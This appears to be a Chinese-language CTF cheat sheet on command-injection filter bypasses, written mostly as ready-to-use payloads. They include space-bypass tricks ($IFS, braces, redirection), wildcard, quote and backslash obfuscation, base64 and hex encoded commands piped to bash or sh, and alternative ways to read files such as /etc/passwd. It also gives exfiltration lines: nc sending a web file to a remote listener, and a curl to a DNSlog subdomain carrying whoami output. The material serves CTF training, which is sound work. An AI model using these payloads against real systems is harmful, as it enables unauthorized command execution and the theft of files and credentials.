命令之间使用 || 连接,实现逻辑或的功能。
只有在 || 左边的命令返回假(命令返回值 $? == 1),|| 右边的命令才会被执行。这和 c 语言中的逻辑或语法功能相同,即实现短路逻辑或操作。
只要有一个命令返回真(命令返回值 $? == 0),后面的命令就不会被执行。–直到返回真的地方停止执行。
举例,ping命令判断存活主机
ping -c 1 -w 1 192.168.1.1 &> /dev/null && result=0 ||result=1 if [ "$result" == 0 ];then echo "192.168.1.1 is UP!" else echo "192.168.2.1 is DOWN!" fi
注意 &>要连起来写。
2.一些绕过方式
linux下绕过空格
{cat,flag.txt}
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
ca\t fl\ag
kg=$'\x20flag.txt'&&cat$kg(\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过)
windows下绕过空格
(实用性不是很广,也就type这个命令可以用)
type.\flag.txt
type,flag.txt
echo,123456
1:通配符绕过
???在linux里面可以进行代替字母
/???/c?t flag.txt
*在linux里面可以进行模糊匹配
cat flag.* *进行模糊匹配php
nc外带数据
本地监听端口
nc -lvp 9999
命令执行出 ping 127.0.0.0 & nc ip port > key.php
内联执行的做法:
payload:cat$IFS$1`ls`
使用内联执行会将 ``内的输出作为前面命令的输入,当我们输入上述payload时,等同于cat falg.php;cat index.php
利用DNS管道解析:
这里提供一个在线网址,可以直接进行给一个利用网址:admin.dnslog.link注册一个账号后会分配一个子域名可以利用。
|curl `whoami`.http://xxxx.xxx(子域名)
这样就会在利用网址看到反弹结果。
网络地址转化为数字地址
网络地址有另外一种表示形式,就是数字地址比如127.0.0.1可以转化为2130706433
可以直接访问
http://2130706433
或者http://0x7F000001
这样就可以绕过.的ip过滤,这里给个转化网址:
http://www.msxindl.com/tools/ip/ip_num.asp
通过查看文件的权限 chmod +777赋予权限
l's' -la
c'h'm'o'd +777 /filename
代替cat的命令
cat:由第一行开始显示内容,并将所有内容输出
tac:从最后一行倒序显示内容,并将所有内容输出
more:根据窗口大小,一页一页的现实文件内容
less:和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head:只显示头几行
tail:只显示最后几行
nl:类似于cat -n,显示时输出行号
tailf:类似于tail -f
sort%20/flag 读文件
dir来查看当前目录文件
Linux花式读取文件内容
ps:目标是获取flag.txt的内容
static-sh读取文件:
static-sh ./flag.txt
#输出结果:
./flag.txt: line 1: flag{this_is_a_test}: not found
paste读取文件:
paste ./flag.txt /etc/passwd
#输出结果:
flag{this_is_a_test}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
diff读取文件 :
diff ./flag.txt /etc/passwd
#输出结果:
1c1,45< flag{this_is_a_test}\ No newline at end of file---> root:x:0:0:root:/root:/bin/bash> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin> bin:x:2:2:bin:/bin:/usr/sbin/nologin> sys:x:3:3:sys:/dev:/usr/sbin/nologin> sync:x:4:65534:sync:/bin:/bin/sync
od读取文件
od -a ./flag.txt
#输出结果:
0000000 f l a g { t h i s _ i s _ a _ t0000020 e s t }0000024
bzmore读取文件:
bzmore ./flag.txt
bzless读取文件:
bzless ./flag.txtecho `bzless ./flag.txt`
#输出结果:
------> ./flag.txt <------ flag{this_is_a_test}
curl读取文件:
curl file:///home/coffee/flag
nc 传输文件
靶机:
nc 10.10.10.10 4444 < /var/www/html/key.php
接受机:
nc -l 4444 > key.txt
wget操作进行目标读取
wget url -P path
一些命令分隔符
linux中:%0a 、%0d 、; 、& 、| 、&&、||
windows中:%0a、&、|、%1a(一个神奇的角色,作为.bat文件中的命令分隔符)
过滤了 bash可以用sh
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
拼接flag 1;a=fl;b=ag.php;cat $a$b
其中有这么一条过滤方法,我们用上述方法无法绕过,但是我们只要改变一下顺序就可以:1;a=ag.php;b=fl;cat $b$a绕过空格就用上面提到的$IFS$1完整的payload 1;a=ag.php;b=fl;cat$IFS$1$b$aelse if(preg_match("/.*f.*l.*a.*g.*/", $ip)){die("fxck your flag!");}
编码绕过
base64:
echo YWJjZGU=|base64 -d //打印出来abcde
echo Y2F0IGZhbGcucGhw|base64 -d|bash //cat flag.php
echo Y2F0IGZhbGcucGhw|base64 -d|sh //cat flag.php
hex编码绕过:
echo 63617420666c61672e706870 | xxd -r -p|bash //cat flag.ph
unicode编码
$(printf “\154\163”) //ls
$(printf “\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70”) //cat flag.php
对于关键字还可以用单引号和反斜杠绕过 比如 cat fl’'ag cat fl\ag
总结一下,payload1;a=ag.php;b=fl;cat$IFS$1$b$a和 cat$IFS$1`ls`
得到的flag查看源码。
3.总结
对于此类题目常考于大学招新赛、机关企业内部CTF比赛、渗透证书的考察点等等,难度不大,就是在于姿势的积累。